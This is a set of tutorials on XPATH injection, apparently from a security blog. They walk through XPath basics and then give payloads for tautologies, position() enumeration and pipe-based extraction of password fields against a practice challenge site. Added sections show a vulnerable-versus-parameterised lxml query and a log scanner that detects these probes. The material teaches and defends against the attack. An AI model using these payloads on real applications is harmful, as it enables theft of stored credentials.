Kyfx

XPATH tut

May 20th, 2015
XPATH Injection: Iterating through Elements and Entities

Long after posting the basics of XPATH for XPATH Injection, here is the first part on XPATH injection proper. I won't take much time on this one, as I assume you have read the other XPATH tutorials here. In this tutorial we will learn how to inject into a URL vulnerable to XPATH injection with zero knowledge of the file structure.

We are going to discuss the following in this tutorial:
1. Testing and confirming XPATHi
2. Iterating through the Nodes
3. Extracting Data from Siblings

First of all, I hope you know the basics: what XPATH is, the structure of an XML file, and the queries used to extract data from XML using XPATH. If you don't, I am sure you will get "very confused" by this tutorial.

So before you start reading this, I assume you have read the other tutorials on XPATH.

1. Testing and confirming XPATHi

Testing for XPATH injection and confirming it is the most important part, as most of us, and especially the readers of securityidiots, see SQLi everywhere and anywhere they find an error, even if the error is a conversion error, an internal error or a programming error, and sometimes people even assume that getting blocked by a WAF on typing "union select" means the site is vulnerable to SQLi. Hmmm, interesting, and their reaction is like:

Well guys, I suppose I have written enough tutorials on how to test and confirm SQLi; sometimes it's good to read them too. Keeping that apart, here we are going to start testing for XPATH.

When we see an input field, the first thing we will check is whether we can make the condition true using the tests below:
1 or 1=1
1 or true
' or ''='
" or ""="
In the case of XPATH, SQLi and many other injections these will work the same way. So, to confirm that it is XPATHi, we can use the position() function, which is specific to XPATH. Here are a few tests we can try:
1 or position()=1 or 1=1
1 or position()=1 or true
' or position()=1 or ''='
" or position()=1 or ""="
If any of the above works, you can assume that the injection you are dealing with is an XPATH injection. Below is the example XML file which we will be using throughout this tutorial:

<xmlfile>
  <users>
    <user>
      <name first="Zenodermus" last="Javanicus"/>
      <id>1</id>
      <username>Zen</username>
      <password>n00b_132</password>
      <phone>123-456-7890</phone>
    </user>
    <user>
      <name first="Rahul" last="Maane"/>
      <id>2</id>
      <username>Monster</username>
      <password>i_om-GAWWWD</password>
      <phone>603-478-4115</phone>
    </user>
    <user>
      <name first="Ashx" last="Khan"/>
      <id>3</id>
      <username>Trojan</username>
      <password>ihavemoregfsthanyou</password>
      <phone>222-222-2222</phone>
    </user>
    <user>
      <name first="Rummy" last="Khan"/>
      <id>4</id>
      <username>CyberGh0st</username>
      <password>SelectPassFromDual</password>
      <phone>88-777-8989</phone>
    </user>
  </users>
</xmlfile>

Here are some basic XPATH queries which can be used to extract data from the above file:
To extract the username where id=1:
/xmlfile/users/user[id='1']/username
To extract the username where id=2:
/xmlfile/users/user[id='2']/username
To extract the password where the username is Monster:
/xmlfile/users/user[username="Monster"]/password
To extract the phone where the username is Trojan and the password is ihavemoregfsthanyou:
/xmlfile/users/user[username="Trojan" and password="ihavemoregfsthanyou"]/phone
To extract the first username:
/xmlfile/users/user[position()=1]/username

Looking at the example queries above, I think it must be clear enough for all of you to understand the basic way of extracting data using XPATH queries.

Now let's take this example "Link", which shows the phone number of the user passed in the username parameter. We can only get the number if we know the username.

2. Iterating through the Nodes

So let's try injecting it with XPATH. Before we start injecting, let's guess what the query working inside could be. It should be something like "/root/something/user[username="<our_input_here>"]/phone". Assuming this, let's try the injections below:
http://leettime.net/zen_challenge1/challenge_2.php?username='or''='
And we got the number of the first user. Now, to get the number of the second user, we will use position() as I did above:
http://leettime.net/zen_challenge1/challenge_2.php?username='or position()=2 and''='
And we got the number of the second user. Changing position() again gives us the third:
http://leettime.net/zen_challenge1/challenge_2.php?username='or position()=3 and''='
And we got the number of the third user. In the same way we can keep changing position() to get the phone numbers of the rest of the users.
Here we are done iterating through the nodes, but the problem is that we are not able to extract the other details, like passwords, which should and must be saved in the same XML file. Now comes the next step, using which we can enumerate any other details we want.

3. Extracting Data from Siblings

Till now we were using position(), so we are able to enumerate through the nodes only; the /phone at the end is hard-coded, so we can't change it to extract other data. But worry not! We have the pipe operator, which combines two queries in XPATH. Each of the inputs below closes the user[...] predicate, picks the n-th child element with *[n], and then uses the pipe to turn the hard-coded ']/phone' tail into a second, harmless query /a['']/phone that simply matches nothing. Here is how we can do this:
http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[2]|/a['
The above injection extracts the second element from the first node.
http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[3]|/a['
The above injection extracts the third element from the first node.
http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[4]|/a['
The above injection extracts the fourth element from the first node.
http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[5]|/a['
The above injection extracts the fifth element from the first node.
http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=2]/*[2]|/a['
Here I changed the position, which means it will extract the second element of the second node; in the same way you can keep changing and extracting.
Using this we can extract data with zero knowledge of the internal file structure. Here is an XPATHi challenge on which you can try the above method:
http://leettime.net/index.php
Try extracting the username and password of all the users. That's all for this tutorial; I will catch you back soon with another one.
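Added here as an illustration, not code from the tutorial or from the challenge site: the string-concatenated query that sections 2 and 3 (and the "Basics XPATH Injection" post below) assume, beside the parameterised version that binds the input as an XPath variable, both evaluated with lxml against the tutorial's own XML. The phone_vulnerable/phone_parameterised functions and the assumption that the page prints the first node it gets back are mine.

```python
# Added example (not from the tutorial or the leettime challenge): the query
# construction the walkthrough assumes, next to the parameterised version,
# both run with lxml (libxml2's XPath 1.0 engine) against the tutorial's XML.
from lxml import etree

# The tutorial's example file, embedded so the script runs offline.
XML = b"""<xmlfile><users>
<user><name first="Zenodermus" last="Javanicus"/><id>1</id><username>Zen</username><password>n00b_132</password><phone>123-456-7890</phone></user>
<user><name first="Rahul" last="Maane"/><id>2</id><username>Monster</username><password>i_om-GAWWWD</password><phone>603-478-4115</phone></user>
<user><name first="Ashx" last="Khan"/><id>3</id><username>Trojan</username><password>ihavemoregfsthanyou</password><phone>222-222-2222</phone></user>
<user><name first="Rummy" last="Khan"/><id>4</id><username>CyberGh0st</username><password>SelectPassFromDual</password><phone>88-777-8989</phone></user>
</users></xmlfile>"""
ROOT = etree.fromstring(XML)


def first_as_text(results):
    """Assumption about the page: it prints whatever the first returned node
    holds (element text for an element, the string itself for text())."""
    if not results:
        return None
    first = results[0]
    return first.text if etree.iselement(first) else str(first)


def phone_vulnerable(username):
    """The pattern the tutorial exploits: the parameter is pasted into the
    XPath string, so quotes, brackets and | in the input become query syntax."""
    query = "/xmlfile/users/user[username='" + username + "']/phone/text()"
    return first_as_text(ROOT.xpath(query))


def phone_parameterised(username):
    """Fix: bind the input as the XPath variable $u. The engine compares the
    username element against the value as data, so ' or ''=' is just a
    (non-existent) username and position() never reaches the parser."""
    query = "/xmlfile/users/user[username=$u]/phone/text()"
    return first_as_text(ROOT.xpath(query, u=username))


if __name__ == "__main__":
    # A legitimate lookup followed by the tutorial's inputs, decoded from its URLs.
    for inp in ("Trojan", "' or ''='", "' or position()=2 and ''='",
                "' or position()=1]/*[2]|/a['"):
        print(f"{inp!r:36} vulnerable={phone_vulnerable(inp)!r:16} "
              f"fixed={phone_parameterised(inp)!r}")
```

XPath variables exist in libxml2/lxml, Java's javax.xml.xpath and .NET, but PHP's DOMXPath (the challenge is a .php page) has no equivalent; there the input has to be rejected unless it matches a strict allow-list, or wrapped as a concat() literal.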


Basics XPATH Injection

Starting in the name of my God "Allah", the most beneficent, the most merciful.

In this tutorial we will discuss the basics of XPATH injection and learn the basics of injecting into XPATH queries. XPATH queries are very much like SQL queries, and the rules for injecting into XPATH are the same as for SQL queries: you have to take care of closing the input with a single or double quote and then commenting out the rest if required. For a better understanding I will be using an XML file to explain all the examples in this tutorial; you can also use Leettime to practice.
<userdb>
  <user>
    <name first="Jeff" last="Smiley"/>
    <id>1</id>
    <username>Jefferson</username>
    <password>Jutobi</password>
    <phone>123-456-7890</phone>
  </user>
  <user>
    <name first="Chunk" last="MacRunfast"/>
    <id>2</id>
    <username>Alexandra</username>
    <password>securityidiots</password>
    <phone>603-478-4115</phone>
  </user>
  <user>
    <name first="Zenodermus" last="Javanicus"/>
    <id>3</id>
    <username>Zen</username>
    <password>@lltogether</password>
    <phone>222-222-2222</phone>
  </user>
</userdb>

As I know most of the readers here must have some basic knowledge of SQL queries, rather than starting from XPATH I will show you how you can simply relate or convert a SQL query into an XPATH query. Below is a basic SQL query where we are extracting the username from a table user under the database userdb using a condition on id.
select username from userdb.user where id=1

Now let's convert the above query into an XPATH query and see the difference.
/userdb/user[id='1']/username
The above query will extract the username of the user whose id is 1, which is "Jefferson" in the XML file.

As you can see, in the above query we first specified the path, then the condition and then what we want to extract; yeah, it's as simple as that. Now I hope you can understand a basic XPATH query. So let's inject the above query to enumerate the usernames of each user one by one. Assuming we do not know the user id of each user and want to check the usernames of all the users, we can use the position() function. Here is an example of the position function:
/userdb/user[position()=1]/username
Will extract the first username, which is "Jefferson".

/userdb/user[position()=2]/username
Will extract the second username, which is "Alexandra".

/userdb/user[position()=3]/username
Will extract the third username, which is "Zen".

Now let's take the query we used before and inject it using the position function.
/userdb/user[id='ourinputhere']/username
Let's say our input is ' or position()=1 or ' ; then the query will become
/userdb/user[id='' or position()=1 or '']/username
Will extract the first username, which is "Jefferson".

This means the condition says either the id should be empty or it is the first user, so we get the first username. But this injection does not allow us to enumerate other details: the other columns in SQL terms, or in XPATH terms the other siblings. So how do we get the other siblings, given that the '/username' at the end of the query makes it extract only the usernames?

Here we have a bypass for that: the pipe character, also known as the union select operator of XPATH. The pipe operator can be used to concatenate two different statements. So what we will do is use the pipe to separate the /username part into a second statement, and no matter whether any output comes from the second statement or not, XPATH will still give us the output of the first statement. This means all we need to concentrate on is keeping our first statement valid. So we can make our query something like this.
/userdb/user[id='ourinputhere']/username
Let's say our input is ' or position()=1]/New_Element_name|a[' ; then the query will become
/userdb/user[id='' or position()=1]/New_Element_name|a['']/username

Now, for example, if we want to extract the password of a user using the above injection, we just have to put the name of the password column in place of the element, which gives us the results below:
/userdb/user[id='ourinputhere']/username
Let's say our input is ' or position()=1]/password|a[' ; then the query will become
/userdb/user[id='' or position()=1]/password|a['']/username
Will extract the first user's password, which is "Jutobi".

It successfully gives us the password, but we simply assumed that the password column is named password, which was just an assumption. What if the column name for passwords is something like 'my_pass'? Then we won't be able to extract it. Here we can use another trick: if you read Selecting Unknown Nodes carefully, you may already know what we can do. We can use * to select an unknown node or element, and we only have to specify which element we want. Look at the example below carefully:
/userdb/user[id='ourinputhere']/username
Let's say our input is ' or position()=1]/*[1]|a[' ; then the query will become
/userdb/user[id='' or position()=1]/*[1]|a['']/username
It won't extract anything, as the first element (name) holds its values in attributes, not in element text.
/userdb/user[id='' or position()=1]/*[2]|a['']/username
It will get the second element of the first user, which is '1'.
/userdb/user[id='' or position()=1]/*[3]|a['']/username
It will get the third element of the first user, which is "Jefferson".
/userdb/user[id='' or position()=1]/*[4]|a['']/username
It will get the fourth element of the first user, which is "Jutobi".
/userdb/user[id='' or position()=1]/*[5]|a['']/username
It will get the fifth element of the first user, which is "123-456-7890".

The part of each query that replaces ourinputhere is our injection. In this manner we can enumerate all the siblings of the first user. Now let's change position() to enumerate all the values of the second user.
/userdb/user[id='ourinputhere']/username
Let's say our input is ' or position()=2]/*[1]|a[' ; then the query will become
/userdb/user[id='' or position()=2]/*[1]|a['']/username
It won't extract anything, as the first element (name) holds its values in attributes, not in element text.
/userdb/user[id='' or position()=2]/*[2]|a['']/username
It will get the second element of the second user, which is '2'.
/userdb/user[id='' or position()=2]/*[3]|a['']/username
It will get the third element of the second user, which is "Alexandra".
/userdb/user[id='' or position()=2]/*[4]|a['']/username
It will get the fourth element of the second user, which is "securityidiots".
/userdb/user[id='' or position()=2]/*[5]|a['']/username
It will get the fifth element of the second user, which is "603-478-4115".

In the same manner we can extract the details of the third user too. I hope you enjoyed reading. Please leave your valuable comments and feedback.


Basics of XPATH for XPATH Injection 2

Starting in the name of my God "Allah", the most beneficent, the most merciful.

This is the second part of the basics for XPATH injection; in this tutorial we will learn the basic queries of XPATH.

Headings in this document:
Selecting Nodes in XPATH
The Basic XPATH Expressions
Predicates in XPATH
Selecting Unknown Paths
Selecting Several Paths
Introduction to Injection in XPATH Query

Again we will take some reference from W3Schools; once we understand the basic queries, we will learn how to inject them.

The XML Example Document
We will use the following XML document in the examples below.
<?xml version="1.0" encoding="UTF-8"?>

<bookstore>

  <book>
    <title lang="eng">Harry Potter</title>
    <price>76.99</price>
  </book>

  <book>
    <title lang="eng">Learning XML</title>
    <price>22.95</price>
  </book>

  <book>
    <title lang="eng">Learning XPATH</title>
    <price>30.20</price>
  </book>

  <book>
    <title lang="eng">Learning Secrets of Injections</title>
    <price>50.99</price>
  </book>

  <book>
    <title lang="eng">Learning Programming</title>
    <price>53.45</price>
  </book>

</bookstore>


Selecting Nodes

XPath uses path expressions to select nodes in an XML document. The node is selected by following a path or steps. The most useful path expressions are listed below:

Expression : Description
nodename : Selects all nodes with the name "nodename"
/ : Selects from the root node
// : Selects nodes in the document from the current node that match the selection, no matter where they are
. : Selects the current node
.. : Selects the parent of the current node
@ : Selects attributes


Some Basic XPATH Expressions

In the table below we have listed some path expressions and the result of the expressions:

Path Expression : Result
bookstore : Selects all nodes with the name "bookstore"
/bookstore : Selects the root element bookstore
Note: If the path starts with a slash ( / ) it always represents an absolute path to an element!
bookstore/book : Selects all book elements that are children of bookstore
//book : Selects all book elements no matter where they are in the document
bookstore//book : Selects all book elements that are descendants of the bookstore element, no matter where they are under the bookstore element
//@lang : Selects all attributes that are named lang


Predicates

Predicates are used to find a specific node or a node that contains a specific value.

Predicates are always embedded in square brackets.

In the table below we have listed some path expressions with predicates and the result of the expressions:

Path Expression : Result
/bookstore/book[1] : Selects the first book element that is the child of the bookstore element
/bookstore/book[last()] : Selects the last book element that is the child of the bookstore element
/bookstore/book[last()-1] : Selects all the book elements except the last one that are children of the bookstore element
/bookstore/book[position()<3] : Selects the first two book elements that are children of the bookstore element
//title[@lang] : Selects all the title elements that have an attribute named lang
//title[@lang='eng'] : Selects all the title elements that have an attribute named lang with a value of 'eng'
/bookstore/book[price>35.00] : Selects all the book elements of the bookstore element that have a price element with a value greater than 35.00
/bookstore/book[price>35.00]/title : Selects all the title elements of the book elements of the bookstore element that have a price element with a value greater than 35.00


Selecting Unknown Nodes

XPath wildcards can be used to select unknown XML elements.

Wildcard : Description
* : Matches any element node
@* : Matches any attribute node
node() : Matches any node of any kind


In the table below we have listed some path expressions and the result of the expressions:

Path Expression : Result
/bookstore/* : Selects all the child nodes of the bookstore element
//* : Selects all elements in the document
//title[@*] : Selects all title elements which have any attribute


Selecting Several Paths
By using the | operator in an XPath expression you can select several paths.

In the table below we have listed some path expressions and the result of the expressions:

Path Expression : Result
//book/title | //book/price : Selects all the title AND price elements of all book elements
//title | //price : Selects all the title AND price elements in the document
/bookstore/book/title | //price : Selects all the title elements of the book elements of the bookstore element AND all the price elements in the document



Basics of XPATH for XPATH Injection 1

Starting in the name of my God "Allah", the most beneficent, the most merciful.

"XPATH Injection": if you landed on this page searching for "SQLi error-based XPATH injection", that is already posted in XPATH using UpdateXML and XPATH using ExtractValue, and obviously this time we will not be discussing SQL injection. We are discussing real XPATH injection. As we know, XPATH is a data manipulation language very similar to SQL; using XPATH queries we can enumerate data saved in an XML file. What makes the two different is that, unlike SQL, in XPATH we do not have any access levels, which means that once a document is injectable the attacker gets their hands on the whole database.

XPATH is used to create queries which allow a user to manipulate data inside an XML document. In this tutorial we will start with the basics of XPATH queries to understand them better, and later on we will move on to the injecting part.

Below is a little introduction to XPATH from W3Schools to understand the terminology used in the XPATH data manipulation language. Just as we need to know what a database, tables, columns, data, queries etc. are if we want to learn SQL injection, in the same manner we need to understand the basic structure of XML to inject into XPATH queries.

In XPath, there are seven kinds of nodes: element, attribute, text, namespace, processing-instruction, comment, and document nodes.

XML documents are treated as trees of nodes. The topmost element of the tree is called the root element.

Look at the following XML document:

<?xml version="1.0" encoding="UTF-8"?>

<bookstore>
  <book>
    <title lang="en">Harry Potter</title>
    <author>J K. Rowling</author>
    <year>2005</year>
    <price>29.99</price>
  </book>
</bookstore>
Examples of nodes in the XML document above:
<bookstore> (root element node)
<author>J K. Rowling</author> (element node)
lang="en" (attribute node)

Atomic values

Atomic values are nodes with no children or parent.

Examples of atomic values:
J K. Rowling

"en"

Items

Items are atomic values or nodes.

Relationship of Nodes

Parent

Each element and attribute has one parent.

In the following example, the book element is the parent of the title, author, year, and price:

<book>
  <title>Harry Potter</title>
  <author>J K. Rowling</author>
  <year>2005</year>
  <price>29.99</price>
</book>
Children

Element nodes may have zero, one or more children.

In the following example, the title, author, year, and price elements are all children of the book element:

<book>
  <title>Harry Potter</title>
  <author>J K. Rowling</author>
  <year>2005</year>
  <price>29.99</price>
</book>
Siblings

Nodes that have the same parent.

In the following example, the title, author, year, and price elements are all siblings:

<book>
  <title>Harry Potter</title>
  <author>J K. Rowling</author>
  <year>2005</year>
  <price>29.99</price>
</book>
Ancestors
A node's parent, parent's parent, etc.
In the following example, the ancestors of the title element are the book element and the bookstore element:

<bookstore>

  <book>
    <title>Harry Potter</title>
    <author>J K. Rowling</author>
    <year>2005</year>
    <price>29.99</price>
  </book>

</bookstore>
Descendants

A node's children, children's children, etc.

In the following example, the descendants of the bookstore element are the book, title, author, year, and price elements:

<bookstore>

  <book>
    <title>Harry Potter</title>
    <author>J K. Rowling</author>
    <year>2005</year>
    <price>29.99</price>
  </book>

</bookstore>



Introduction to Injection in XPATH Query

Okay, if you have read the above content, let us for example take a page which takes some input as a name and shows the phone number of that user if that user exists in the XML file. When injecting, we know that for a string type either a single quote or a double quote will be used; we can check which by using ' " or ""=" ' for the double-quote check and ' ' or ''=' ' for the single-quote check. Whichever works tells us which quote is used internally in the query. Now let's assume a simple query:

/root/parent/something[username='our_input_here']/user

So the user is extracted after the condition matches the username given as input. Now we know that if we make the condition true using ' or ''=' we will be able to see the first user's details. But then we want to enumerate each user one by one; as we know, the position() function chooses each node one by one, so we can use it to enumerate each user. Here we go:

/root/parent/something[username='' or position()=1 or '']/user
/root/parent/something[username='' or position()=2 or '']/user
/root/parent/something[username='' or position()=3 or '']/user
/root/parent/something[username='' or position()=4 or '']/user
/root/parent/something[username='' or position()=5 or '']/user

This is how we can enumerate each user one by one.

I hope you learnt the basics of XPATH and XPATH injection. In the next tutorial I will be explaining XPATH injection in more detail, with some much better ways of injecting into XPATH queries.
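The quote tautologies and position() probes this post and the first one describe are also what a defender can look for in request logs. The scanner below is an added example, not part of the original tutorials; the log lines are constructed in the combined-log style, and the rule names and thresholds are mine.

```python
# Added example (not from the tutorial): flag the XPath-injection probes the
# tutorials list (quote tautologies, position() tests, predicate escapes and
# the | union) in the query strings of web-server access log lines.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines; the request paths mirror the tutorial's challenge
# URL with the parameter values URL-encoded as a browser would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [20/May/2015:10:01:02 +0000] "GET /zen_challenge1/challenge_2.php?username=Trojan HTTP/1.1" 200 512
10.0.0.5 - - [20/May/2015:10:01:09 +0000] "GET /zen_challenge1/challenge_2.php?username=%27or%27%27%3D HTTP/1.1" 200 514
10.0.0.5 - - [20/May/2015:10:01:15 +0000] "GET /zen_challenge1/challenge_2.php?username=%27or+position()%3D2+and%27%27%3D HTTP/1.1" 200 514
10.0.0.5 - - [20/May/2015:10:01:31 +0000] "GET /zen_challenge1/challenge_2.php?username=%27+or+position()%3D1%5D/*%5B2%5D%7C/a%5B%27 HTTP/1.1" 200 498
10.0.0.9 - - [20/May/2015:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 2048
10.0.0.9 - - [20/May/2015:10:02:04 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 1024
"""

# (rule name, regex applied to each decoded parameter value)
RULES = [
    # ' or ''=   /   " or ""=   (the quote-type tests from the tutorial)
    ("quote-tautology", re.compile(r"""(['"])\s*or\s*\1\1\s*=""", re.I)),
    # 1 or 1=1   /   1 or true
    ("numeric-tautology", re.compile(r"\bor\s+(1\s*=\s*1|true)\b", re.I)),
    # position()=N : specific to XPath, the tutorial's confirmation test
    ("position-probe", re.compile(r"\bposition\s*\(\s*\)\s*=", re.I)),
    # input closes a predicate and starts a new step: ]/*[2]  or  ]/name|a[
    ("predicate-escape", re.compile(r"\]\s*/[^\s\[]*\[")),
    # the union operator used to neutralise the hard-coded tail: |/a[
    ("union-operator", re.compile(r"\|\s*/")),
]

REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def scan_line(line):
    """Return [(parameter, rule name), ...] for one access log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    hits = []
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        decoded = unquote(value)  # second pass catches %2527-style double encoding
        for rule, regex in RULES:
            if regex.search(decoded):
                hits.append((name, rule))
    return hits


def scan_log(text):
    """Map 1-based line number -> hits, for the lines that have at least one."""
    report = {}
    for number, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            report[number] = hits
    return report


if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {hits}")
```

An apostrophe in ordinary data (O'Brien in the sample) does not trip the quote rule because it needs the "or" and the doubled quote that follow; still, treat hits as triage signals and confirm against the application's own query construction before alerting on them.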